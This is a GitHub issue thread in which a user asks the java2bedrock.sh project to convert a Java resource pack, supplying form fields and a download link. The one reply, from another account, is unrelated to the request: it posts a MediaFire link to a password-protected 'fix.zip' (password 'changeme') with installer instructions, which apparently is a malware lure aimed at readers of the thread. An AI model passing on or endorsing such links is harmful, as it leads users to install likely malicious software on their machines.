### ISSUE TITLE
pack.[Pack]: 

### ISSUE THREAD

**Issue by gamerfel78** [Kas-tle/java2bedrock.sh#33317]
### Java Pack Direct Download URL

https://drive.google.com/uc?export=download&id=1vnfO5lb2Q8XLZaT_8R7dXLW_LWdYTNII

### Default Assets Version

None

### Block Material

alpha_test

### Attachable Material

entity_emissive_alpha_one_sided

### Archive Scratch Files

None

### Rename Model Files

None

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct. I have permission to use all assets I have linked to within this form.

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
